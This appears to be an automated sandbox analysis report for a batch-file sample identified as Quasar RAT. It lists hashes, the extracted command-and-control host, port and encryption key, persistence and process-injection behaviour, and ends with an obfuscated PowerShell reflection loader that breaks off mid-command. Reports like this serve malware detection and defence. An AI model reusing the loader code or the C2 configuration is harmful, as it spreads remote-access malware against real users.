Analysis
-
max time kernel
600s -
max time network
455s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
02-05-2024 20:56
Static task
static1
Behavioral task
behavioral1
Sample
R0X-Built.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
R0X-Built.bat
Resource
win10v2004-20240419-en
General
-
Target
R0X-Built.bat
-
Size
326KB
-
MD5
d967ead2d930328fe784be4e199cca49
-
SHA1
cfe200ede38b0c10638d181d64ce202c58b01ba1
-
SHA256
fcedeca6396c7c129f169f635085b84a0af4ab5d1043affe837c96640642230a
-
SHA512
b63459d12140f400539b7233cf8854df6f2805f9f09a902df6fe20649b8af27be408ae667b4101444ce5b1848e4b37383a309c4962e55709c2fe11410a47ee71
-
SSDEEP
6144:bx2lEdv93qPAK5WiwSRae50rX3cvmZi8pSOeAxqDpWStZ9qnR:b1dYPmmH5Tm88pnecqDp3AR
Malware Config
Extracted
quasar
3.1.5
Slave
even-lemon.gl.at.ply.gg:33587
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
KaNwItdY6wlv5nCN4prL
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-powershell
-
subdirectory
Windows
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/4004-23-0x0000000007B60000-0x0000000007BCC000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2880 created 636 2880 powershell.EXE winlogon.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 2 4004 powershell.exe 3 4004 powershell.exe 4 4004 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
$srr-powershell.exeinstall.exepid process 1676 $srr-powershell.exe 4740 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 6 IoCs
Processes:
svchost.exepowershell.EXEOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2880 set thread context of 3104 2880 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 57 IoCs
Processes:
powershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 02 May 2024 20:57:59 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1714683478" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={B3B1006E-94DD-4816-8047-6E0F3C500FA4}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe -
Processes:
$srr-powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 $srr-powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e $srr-powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e $srr-powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe$srr-powershell.exepowershell.EXEdllhost.exepid process 4004 powershell.exe 4004 powershell.exe 1676 $srr-powershell.exe 1676 $srr-powershell.exe 2880 powershell.EXE 2880 powershell.EXE 2880 powershell.EXE 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe 3104 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exe$srr-powershell.exepowershell.EXEdllhost.exedwm.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 1676 $srr-powershell.exe Token: SeDebugPrivilege 2880 powershell.EXE Token: SeDebugPrivilege 2880 powershell.EXE Token: SeDebugPrivilege 3104 dllhost.exe Token: SeShutdownPrivilege 464 dwm.exe Token: SeCreatePagefilePrivilege 464 dwm.exe Token: SeShutdownPrivilege 3344 Explorer.EXE Token: SeCreatePagefilePrivilege 3344 Explorer.EXE Token: SeShutdownPrivilege 464 dwm.exe Token: SeCreatePagefilePrivilege 464 dwm.exe Token: SeShutdownPrivilege 3344 Explorer.EXE Token: SeCreatePagefilePrivilege 3344 Explorer.EXE -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEpid process 3844 RuntimeBroker.exe 3344 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 1072 wrote to memory of 4004 1072 cmd.exe powershell.exe PID 1072 wrote to memory of 4004 1072 cmd.exe powershell.exe PID 1072 wrote to memory of 4004 1072 cmd.exe powershell.exe PID 4004 wrote to memory of 4532 4004 powershell.exe schtasks.exe PID 4004 wrote to memory of 4532 4004 powershell.exe schtasks.exe PID 4004 wrote to memory of 4532 4004 powershell.exe schtasks.exe PID 4004 wrote to memory of 1676 4004 powershell.exe $srr-powershell.exe PID 4004 wrote to memory of 1676 4004 powershell.exe $srr-powershell.exe PID 4004 wrote to memory of 1676 4004 powershell.exe $srr-powershell.exe PID 4004 wrote to memory of 4740 4004 powershell.exe install.exe PID 4004 wrote to memory of 4740 4004 powershell.exe install.exe PID 4004 wrote to memory of 4740 4004 powershell.exe install.exe PID 2880 wrote to memory of 3104 2880 powershell.EXE dllhost.exe PID 2880 wrote to memory of 3104 2880 powershell.EXE dllhost.exe PID 2880 wrote to memory of 3104 2880 powershell.EXE dllhost.exe PID 2880 wrote to memory of 3104 2880 powershell.EXE dllhost.exe PID 2880 wrote to memory of 3104 2880 powershell.EXE dllhost.exe PID 2880 wrote to memory of 3104 2880 powershell.EXE dllhost.exe PID 2880 wrote to memory of 3104 2880 powershell.EXE dllhost.exe PID 2880 wrote to memory of 3104 2880 powershell.EXE dllhost.exe PID 3104 wrote to memory of 636 3104 dllhost.exe winlogon.exe PID 3104 wrote to memory of 692 3104 dllhost.exe lsass.exe PID 3104 wrote to memory of 988 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 464 3104 dllhost.exe dwm.exe PID 3104 wrote to memory of 760 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 452 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1052 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1108 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1188 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1196 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1204 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1316 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1412 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1444 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1528 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1620 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1632 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1640 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1752 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1772 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1832 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1920 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1984 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1992 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1228 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1792 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 2140 3104 dllhost.exe spoolsv.exe PID 3104 wrote to memory of 2268 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 2360 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 2380 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 2440 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 2492 3104 dllhost.exe sysmon.exe PID 3104 wrote to memory of 2536 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 2544 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 2552 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 2560 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 2768 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 1060 3104 dllhost.exe sihost.exe PID 3104 wrote to memory of 684 3104 dllhost.exe unsecapp.exe PID 3104 wrote to memory of 1344 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 3344 3104 dllhost.exe Explorer.EXE PID 3104 wrote to memory of 3480 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 3500 3104 dllhost.exe svchost.exe PID 3104 wrote to memory of 3844 3104 dllhost.exe RuntimeBroker.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{962babb9-fca9-4ea0-ba76-21bbdb3eba64}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SaKyHMEZbXiX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$drcXQtlxKKbwAx,[Parameter(Position=1)][Type]$vbbxyTXchR)$tfUciSfIPRm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'l'+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+'c'+','+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$tfUciSfIPRm.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+''+','+'Hid'+'e'+'By'+[Char](83)+''+'i'+''+[Char](103)+''+','+''+'P'+'u'+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$drcXQtlxKKbwAx).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+'M'+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+'d');$tfUciSfIPRm.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+'k'+'e'+'',''+'P'+'u'+'b'+''+'l'+''+'i'+''+'c'+','+'H'+''+'i'+''+'d'+'e'+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$vbbxyTXchR,$drcXQtlxKKbwAx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+'e'+[Char](44)+''+'M'+'a'+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');Write-Output $tfUciSfIPRm.CreateType();}$XDzDUpcqwQRrX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 